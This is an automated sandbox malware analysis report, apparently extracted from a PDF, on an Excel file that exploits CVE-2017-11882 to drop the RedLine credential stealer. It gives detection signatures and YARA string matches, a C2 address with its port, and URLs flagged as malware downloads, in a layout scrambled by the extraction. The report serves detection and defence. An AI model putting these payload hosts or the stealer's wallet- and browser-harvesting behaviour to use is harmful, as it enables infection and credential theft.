Automated Malware Analysis Report for POAT2076452.xlsx ...

ID: 576509Sample Name:POAT2076452.xlsxCookbook:defaultwindowsofficecookbook.jbsTime: 15:29:06Date: 22/02/2022Version: 34.0.0 Boulder Opal

2444444444445555556666666666677889999

1010101010111415

1516161616161616161616171717181818191919192020202121212222

Table of Contents

Table of ContentsWindows Analysis Report POAT2076452.xlsx

OverviewGeneral InformationDetectionSignaturesClassification

Process TreeMalware Configuration

Threatname: RedLineYara Signatures

PCAP (Network Traffic)Memory DumpsUnpacked PEs

Sigma SignaturesExploitsSystem Summary

Joe Sandbox SignaturesAV DetectionExploitsNetworkingSystem SummaryData ObfuscationBoot SurvivalHooking and other Techniques for Hiding and ProtectionMalware Analysis System EvasionHIPS / PFW / Operating System Protection EvasionStealing of Sensitive InformationRemote Access Functionality

Mitre Att&ck MatrixBehavior GraphScreenshots

ThumbnailsAntivirus, Machine Learning and Genetic Malware Detection

Initial SampleDropped FilesUnpacked PE FilesDomainsURLs

Domains and IPsContacted DomainsContacted URLsURLs from Memory and BinariesWorld Map of Contacted IPs

Public IPs

General InformationWarnings

SimulationsBehavior and APIs

Joe Sandbox View / ContextIPsDomainsASNsJA3 FingerprintsDropped Files

Created / dropped FilesC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exeC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34F90E45.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FE9EF17.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51123782.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\540F5A54.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\597D09DF.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D634E2C.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5A50888.emfC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF292561.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEDCE7D6.jpegC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBC9D9B.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E382C2E0.jpegC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F0748BEE.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9EE9.pngC:\Users\user\AppData\Local\Temp\tmp3E26.tmpC:\Users\user\AppData\Local\Temp\tmp3EE2.tmpC:\Users\user\AppData\Local\Temp\tmp3FAE.tmpC:\Users\user\AppData\Local\Temp\tmp533A.tmp

Copyright Joe Security LLC 2022 of 65

22232323242424252525252626262727272828282929292930303031313131313132343434343437464646464646464646

4747474747

47474848

484848

49494949505164

65

C:\Users\user\AppData\Local\Temp\tmp6222.tmpC:\Users\user\AppData\Local\Temp\tmp62EE.tmpC:\Users\user\AppData\Local\Temp\tmp6417.tmpC:\Users\user\AppData\Local\Temp\tmp64E3.tmpC:\Users\user\AppData\Local\Temp\tmp66A8.tmpC:\Users\user\AppData\Local\Temp\tmp67A3.tmpC:\Users\user\AppData\Local\Temp\tmp6AC0.tmpC:\Users\user\AppData\Local\Temp\tmp6C85.tmpC:\Users\user\AppData\Local\Temp\tmp7108.tmpC:\Users\user\AppData\Local\Temp\tmp71C5.tmpC:\Users\user\AppData\Local\Temp\tmp72BF.tmpC:\Users\user\AppData\Local\Temp\tmp738B.tmpC:\Users\user\AppData\Local\Temp\tmp7486.tmpC:\Users\user\AppData\Local\Temp\tmp7551.tmpC:\Users\user\AppData\Local\Temp\tmp764C.tmpC:\Users\user\AppData\Local\Temp\tmp7718.tmpC:\Users\user\AppData\Local\Temp\tmp7841.tmpC:\Users\user\AppData\Local\Temp\tmp790D.tmpC:\Users\user\AppData\Local\Temp\tmp79D9.tmpC:\Users\user\AppData\Local\Temp\tmp7AA5.tmpC:\Users\user\AppData\Local\Temp\tmp7BCE.tmpC:\Users\user\AppData\Local\Temp\tmp7CF7.tmpC:\Users\user\AppData\Local\Temp\~DF179744FD61C7CF51.TMPC:\Users\user\AppData\Local\Temp\~DF26FE9B5EC11612F4.TMPC:\Users\user\AppData\Local\Temp\~DFAB0D2DA66A547388.TMPC:\Users\user\AppData\Local\Temp\~DFEA839BB433B75553.TMPC:\Users\user\Desktop\~$POAT2076452.xlsxC:\Users\Public\vbc.exe

Static File InfoGeneralFile Icon

Network BehaviorNetwork Port DistributionTCP PacketsUDP PacketsDNS QueriesDNS AnswersHTTP Request Dependency GraphHTTP PacketsHTTPS Proxied Packets

StatisticsBehavior

System BehaviorAnalysis Process: EXCEL.EXEPID: 2580, Parent PID: 596

GeneralFile ActivitiesRegistry Activities

Key CreatedKey Value Created

Analysis Process: EQNEDT32.EXEPID: 2664, Parent PID: 596GeneralFile ActivitiesRegistry Activities

Key Created

Analysis Process: vbc.exePID: 1828, Parent PID: 2664GeneralFile Activities

File Read

Registry ActivitiesKey CreatedKey Value Created

Analysis Process: vbc.exePID: 2844, Parent PID: 1828GeneralFile Activities

File CreatedFile DeletedFile WrittenFile Read

Disassembly


Windows Analysis Report POAT2076452.xlsx

Overview

General Information

Sample Name:

POAT2076452.xlsx

Analysis ID: 576509

MD5: e9ffc84abf7ed6f…

SHA1: d636a41a99a022…

SHA256: 03d548395841b2…

Tags: Formbook

VelvetSweatshop xlsx

Infos:

Detection

RedLine

Score: 100

Range: 0 - 100

Whitelisted: false

Confidence: 100%

Signatures

Yara detected RedLine Stealer

Found malware configuration

Sigma detected: EQNEDT32.EXE c…

Multi AV Scanner detection for subm…

Malicious sample detected (through…

Sigma detected: Droppers Exploiting…

Sigma detected: File Dropped By EQ…

Antivirus detection for URL or domain

Tries to steal Crypto Currency Walle…

Uses known network protocols on n…

Office equation editor starts process…

.NET source code contains potentia…

Injects a PE file into a foreign proce…

Sigma detected: Suspicious Program…

Sigma detected: Execution from Su…

Queries sensitive video device infor…

Office equation editor drops PE file

Queries sensitive disk information (v…

Machine Learning detection for drop…

Searches for Windows Mail specific…

Drops PE files to the user root direc…

Found many strings related to Crypt…

Tries to harvest and steal browser in…

Queries the volume information (nam…

Yara signature match

May sleep (evasive loops) to hinder…

Checks if Antivirus/Antispyware/Fire…

Detected potential crypto function

Stores large binary data to the regis…

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in co…

Potential document exploit detected…

HTTP GET or POST without a user …

IP address seen in connection with …

Downloads executable code via HTT…

Uses insecure TLS / SSL version fo…

Contains long sleeps (>= 3 min)

Enables debug privileges

Classification

Ransomware

Spreading

Phishing

Banker

Trojan / Bot

Adware

Spyware

Exploiter

Evader

Miner

clean

clean

clean

clean

clean

clean

clean

suspicious

suspicious

suspicious

suspicious

suspicious

suspicious

suspicious

malicious

malicious

malicious

malicious

malicious

malicious

malicious

System is w7x64

EXCEL.EXE (PID: 2580 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2664 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5:

A87236E214F6D42A65F5DEDAC816AEC8)vbc.exe (PID: 1828 cmdline: "C:\Users\Public\vbc.exe" MD5: 980EC4304344F277D722024ADE08CD01)

vbc.exe (PID: 2844 cmdline: C:\Users\Public\vbc.exe MD5: 980EC4304344F277D722024ADE08CD01)

cleanup

{

"C2 url": [

"179.43.175.99:21900"

],

"Bot Id": "cheat"

}

Source Rule Description Author Strings

dump.pcap JoeSecurity_RedLine


Joe Security

dump.pcap JoeSecurity_RedLine_1


Joe Security

Process Tree

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Tra c)



00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp

JoeSecurity_RedLine


Joe Security

00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp

JoeSecurity_CredentialStealer


Joe Security

00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp

JoeSecurity_RedLine


Joe Security

00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp

JoeSecurity_CredentialStealer


Joe Security

00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp

JoeSecurity_RedLine


Joe Security

Click to see the 16 entries


5.0.vbc.exe.400000.8.unpack JoeSecurity_RedLine


Joe Security

5.0.vbc.exe.400000.8.unpack JoeSecurity_CredentialStealer


Joe Security

5.0.vbc.exe.400000.8.unpack MALWARE_Win_RedLine

Detects RedLine infostealer

ditekSHen 0x1048a:$u7: RunPE0x13b41:$u8: DownloadAndEx0x9130:$pat14: , CommandLine:0x13079:$v2_1: ListOfProcesses0x1068b:$v2_2: get_ScanVPN0x1072e:$v2_2: get_ScanFTP0x1141e:$v2_2: get_ScanDiscord0x1240c:$v2_2: get_ScanSteam0x12428:$v2_2: get_ScanTelegram0x124ce:$v2_2: get_ScanScreen0x13216:$v2_2: get_ScanChromeBrowsersPaths0x1324e:$v2_2: get_ScanGeckoBrowsersPaths0x13509:$v2_2: get_ScanBrowsers0x135ca:$v2_2: get_ScannedWallets0x135f0:$v2_2: get_ScanWallets0x13610:$v2_3: GetArguments0x11cd9:$v2_4: VerifyUpdate0x165ea:$v2_4: VerifyUpdate0x139ca:$v2_5: VerifyScanRequest0x130c6:$v2_6: GetUpdates0x165cb:$v2_6: GetUpdates

5.0.vbc.exe.400000.12.unpack JoeSecurity_RedLine


Joe Security

5.0.vbc.exe.400000.12.unpack JoeSecurity_CredentialStealer


Joe Security

Click to see the 23 entries

Exploits

System Summary

Memory Dumps

Unpacked PEs

Sigma Signatures

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: Suspicious Program Location with Network Connections

Sigma detected: Execution from Suspicious Folder

Joe Sandbox Signatures


AV Detection

Exploits

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Found malware configuration

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Machine Learning detection for dropped file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Uses known network protocols on non-standard ports

Malicious sample detected (through community Yara rule)

Office equation editor drops PE file

.NET source code contains potential unpacker

Drops PE files to the user root directory

Uses known network protocols on non-standard ports

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Injects a PE file into a foreign processes


Tries to steal Crypto Currency Wallets

Searches for Windows Mail specific files

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)



InitialAccess

Execution PersistencePrivilegeEscalation

DefenseEvasion

CredentialAccess

DiscoveryLateralMovement

Collection ExfiltrationCommandandControl

NetworkEffects

RemoteServiceEffects

Impact

ValidAccounts

2 2 1WindowsManagementInstrumentation

PathInterception

1 1 1ProcessInjection

1 1 1Masquerading

1OSCredentialDumping

1QueryRegistry

RemoteServices

1EmailCollection

ExfiltrationOver OtherNetworkMedium

1 1EncryptedChannel

Eavesdropon InsecureNetworkCommunication

RemotelyTrackDeviceWithoutAuthorization

ModifySystemPartition

DefaultAccounts

1 3Exploitationfor ClientExecution

Boot orLogonInitialization Scripts

1ExtraWindowMemoryInjection

1ModifyRegistry

LSASSMemory

2 3SecuritySoftwareDiscovery

RemoteDesktopProtocol

1ArchiveCollectedData

ExfiltrationOverBluetooth

1 1Non-StandardPort

Exploit SS7to RedirectPhoneCalls/SMS

RemotelyWipe DataWithoutAuthorization

DeviceLockout

DomainAccounts

At (Linux) LogonScript(Windows)

LogonScript(Windows)

1Disable orModifyTools

SecurityAccountManager

1ProcessDiscovery

SMB/Windows AdminShares

3Data fromLocalSystem

AutomatedExfiltration

1 2IngressToolTransfer

Exploit SS7to TrackDeviceLocation

ObtainDeviceCloudBackups

DeleteDeviceData

LocalAccounts

At(Windows)

LogonScript(Mac)

LogonScript(Mac)

2 3 1Virtualization/SandboxEvasion

NTDS 2 3 1Virtualization/SandboxEvasion

DistributedComponentObjectModel

InputCapture

ScheduledTransfer

3Non-ApplicationLayerProtocol

SIM CardSwap

CarrierBillingFraud

CloudAccounts

Cron NetworkLogonScript

NetworkLogonScript

1 1 1ProcessInjection

LSASecrets

1RemoteSystemDiscovery

SSH Keylogging DataTransferSize Limits

2 4ApplicationLayerProtocol

ManipulateDeviceCommunication

ManipulateApp StoreRankingsor Ratings

ReplicationThroughRemovableMedia

Launchd Rc.common

Rc.common

1SoftwarePacking

CachedDomainCredentials

1File andDirectoryDiscovery

VNC GUI InputCapture

ExfiltrationOver C2Channel

MultibandCommunication

Jamming orDenial ofService

AbuseAccessibility Features

ExternalRemoteServices

ScheduledTask

StartupItems

StartupItems

1ExtraWindowMemoryInjection

DCSync 1 1 4SystemInformationDiscovery

WindowsRemoteManagement

Web PortalCapture

ExfiltrationOverAlternativeProtocol

CommonlyUsed Port

Rogue Wi-Fi AccessPoints

DataEncryptedfor Impact

Mitre Att&ck Matrix

Behavior Graph


Behavior GraphID: 576509

Sample: POAT2076452.xlsx

Startdate: 22/02/2022

Architecture: WINDOWS

Score: 100

Found malware configurationMalicious sample detected(through community Yara

rule)

Antivirus detectionfor URL or domain 14 other signatures

EQNEDT32.EXE

12

started

EXCEL.EXE

33 29

started

103.171.0.134, 49165, 80

AARNET-AS-APAustralianAcademicandResearchNetworkAARNe

unknown

C:\Users\user\AppData\Local\...\.win32[1].exe, PE32

dropped

C:\Users\Public\vbc.exe, PE32

dropped

Office equation editorstarts processes (likely

CVE 2017-11882 or CVE-2018-0802)

vbc.exe

12

started C:\Users\user\Desktop\~$POAT2076452.xlsx, data

dropped

olypath.com

178.18.193.160, 49167, 80

VARGONENTR

Turkey

cdn.discordapp.com

162.159.130.233, 443, 49166

CLOUDFLARENETUS

United States

Queries sensitive videodevice information (via

WMI, Win32_VideoController,often done to detect

virtual machines)

Queries sensitive diskinformation (via WMI,

Win32_DiskDrive, oftendone to detect virtual

machines)

Injects a PE file intoa foreign processes

vbc.exe

28

started

179.43.175.99, 21900, 49168, 49170

PLI-ASCH

Panama

api.ip.sb

Searches for WindowsMail specific files

Tries to harvest andsteal browser information

(history, passwords,etc)

Tries to steal CryptoCurrency Wallets

Legend:

Process

Signature

Created File

DNS/IP Info

Is Dropped

Is Windows Process

Number of created Registry Values

Number of created Files

Visual Basic

Delphi

Java

.Net C# or VB.NET

C, C++ or other language

Is malicious

Internet

Hide Legend

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Screenshots

Thumbnails


Source Detection Scanner Label Link

POAT2076452.xlsx 35% ReversingLabs Document-OLE.Exploit.CVE-2017-11882


C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe

100% Joe Sandbox ML


7% ReversingLabs

C:\Users\Public\vbc.exe 7% ReversingLabs

Source Detection Scanner Label Link Download

5.2.vbc.exe.400000.0.unpack 100% Avira HEUR/AGEN.1144480



Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Download File

Download File

Download File





Source Detection Scanner Label Link Download

⊘ No Antivirus matches


ns.adobe.c/s 0% Avira URL Cloud safe

ocsp.entrust.net03 0% URL Reputation safe

tempuri.org/Endpoint/EnvironmentSettings 0% URL Reputation safe

179.43.175.99:21900x0 0% Avira URL Cloud safe

https://api.ip.sb/geoip 0% URL Reputation safe

crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 0% URL Reputation safe

tempuri.org/ 0% URL Reputation safe

www.diginotar.nl/cps/pkioverheid0 0% URL Reputation safe

103.171.0.134/_spaceX2__/.win32.exe 100% Avira URL Cloud malware

tempuri.org/Endpoint/VerifyUpdateResponse 0% URL Reputation safe

tempuri.org/Endpoint/CheckConnectprH= 100% Avira URL Cloud phishing

tempuri.org/Endpoint/SetEnvironment 0% URL Reputation safe

tempuri.org/Endpoint/SetEnvironmentResponse 0% URL Reputation safe

tempuri.org/Endpoint/GetUpdates 0% URL Reputation safe

https://api.ipify.orgcookies//settinString.Removeg 0% URL Reputation safe

179.43.175.99:21900 0% Avira URL Cloud safe

tempuri.org/Endpoint/VerifyUpdate 0% URL Reputation safe

tempuri.org/Endpoint/SetEnvironmenteMH= 100% Avira URL Cloud phishing

ocsp.entrust.net0D 0% URL Reputation safe

tempuri.org/Endpoint/CheckConnectResponse 0% URL Reputation safe

schemas.datacontract.org/2004/07/ 0% URL Reputation safe

https://api.ip.sb/geoip%USERPEnvironmentROFILE% 0% URL Reputation safe

https://api.ip.sbP 0% Avira URL Cloud safe

crl.pkioverheid.nl/DomOvLatestCRL.crl0 0% URL Reputation safe

tempuri.org/Endpoint/GetUpdatesResponse 0% URL Reputation safe

tempuri.org/Endpoint/EnvironmentSettingsResponse 0% URL Reputation safe

olypath.com/RLBIl.exe 100% Avira URL Cloud malware

ns.adobe. 0% URL Reputation safe

https://api.ipify. 0% Avira URL Cloud safe

olypath.comP 0% Avira URL Cloud safe

tempuri.org/h 100% Avira URL Cloud phishing

https://api.ipify.orgcoo 0% Avira URL Cloud safe

179.43.175.99:21900/ 0% Avira URL Cloud safe

Name IP Active Malicious Antivirus Detection Reputation

cdn.discordapp.com 162.159.130.233 true false high

olypath.com 178.18.193.160 true false unknown

api.ip.sb unknown unknown true unknown

Download File

Download File

Download File

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs


Name Malicious Antivirus Detection Reputation

103.171.0.134/_spaceX2__/.win32.exe true Avira URL Cloud: malware unknown

https://cdn.discordapp.com/attachments/926046144130351104/945362888414072923/httpsgithub.comrakam-iorecipesblobmastersegmentstripestripe_balance.model.jsonnet.htme

false high

olypath.com/RLBIl.exe true Avira URL Cloud: malware unknown

179.43.175.99:21900/ true Avira URL Cloud: safe unknown

Name Source Malicious Antivirus Detection Reputation

https://duckduckgo.com/chrome_newtab vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr

false high

ns.adobe.c/s vbc.exe, 00000005.00000002.549398134.000000000500D000.00000004.00000800.00020000.00000000.sdmp

false Avira URL Cloud: safe unknown

https://duckduckgo.com/ac/?q= vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr

false high

ocsp.entrust.net03 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp

false URL Reputation: safe unknown

tempuri.org/Endpoint/EnvironmentSettings vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp


179.43.175.99:21900x0 vbc.exe, 00000005.00000002.548189669.0000000002705000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547940264.0000000002557000.00000004.00000800.00020000.00000000.sdmp

false Avira URL Cloud: safe low

https://api.ip.sb/geoip vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp


schemas.xmlsoap.org/soap/envelope/ vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp

false high

crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0

vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp


tempuri.org/ vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp


www.diginotar.nl/cps/pkioverheid0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp


URLs from Memory and Binaries


tempuri.org/Endpoint/VerifyUpdateResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp


tempuri.org/Endpoint/CheckConnectprH= vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

true Avira URL Cloud: phishing unknown

tempuri.org/Endpoint/SetEnvironment vbc.exe, 00000005.00000002.547940264.0000000002557000.00000004.00000800.00020000.00000000.sdmp


tempuri.org/Endpoint/SetEnvironmentResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp


tempuri.org/Endpoint/GetUpdates vbc.exe, 00000005.00000002.548189669.0000000002705000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547547882.0000000002381000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp


https://api.ipify.orgcookies//settinString.Removeg vbc.exe, vbc.exe, 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp

true URL Reputation: safe unknown

schemas.xmlsoap.org/ws/2004/08/addressing/faultvbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false high

179.43.175.99:21900 vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp


tempuri.org/Endpoint/VerifyUpdate vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp


tempuri.org/Endpoint/SetEnvironmenteMH= vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp


ocsp.entrust.net0D vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp


schemas.xmlsoap.org/ws/2005/05/identity/claims/name

vbc.exe, 00000004.00000002.498497574.0000000002311000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false high

https://ipinfo.io/ip%appdata% vbc.exe, vbc.exe, 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp

false high

crl.entrust.net/server1.crl0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp

false high

schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous

vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false high

tempuri.org/Endpoint/CheckConnectResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp


schemas.datacontract.org/2004/07/ vbc.exe, 00000005.00000002.547940264.0000000002557000.00000004.00000800.00020000.00000000.sdmp




https://api.ip.sb/geoip%USERPEnvironmentROFILE%vbc.exe, vbc.exe, 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp


https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=

vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr

false high

https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search


false high

https://cdn.discordapp.com vbc.exe, 00000004.00000002.498497574.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false high

https://api.ip.sbP vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp


https://www.google.com/favicon.ico tmp72BF.tmp.5.dr false high

https://ac.ecosia.org/autocomplete?q= vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr

false high

crl.pkioverheid.nl/DomOvLatestCRL.crl0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp


schemas.xmlsoap.org/ws/2004/08/addressing vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false high

tempuri.org/Endpoint/GetUpdatesResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp


https://cdn.discordapp.com/attachments/926046144130351104/945362888414072923/httpsgithub.comrakam-io

vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.498497574.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false high



tempuri.org/Endpoint/EnvironmentSettingsResponsevbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp


ns.adobe. vbc.exe, 00000005.00000002.547155081.0000000000797000.00000004.00000020.00020000.00000000.sdmp


https://api.ipify. vbc.exe true Avira URL Cloud: safe unknown

https://secure.comodo.com/CPS0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp

false high

https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=


false high

olypath.comP vbc.exe, 00000004.00000002.498573662.0000000002350000.00000004.00000800.00020000.00000000.sdmp


tempuri.org/h vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp


crl.entrust.net/2048ca.crl0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp

false high

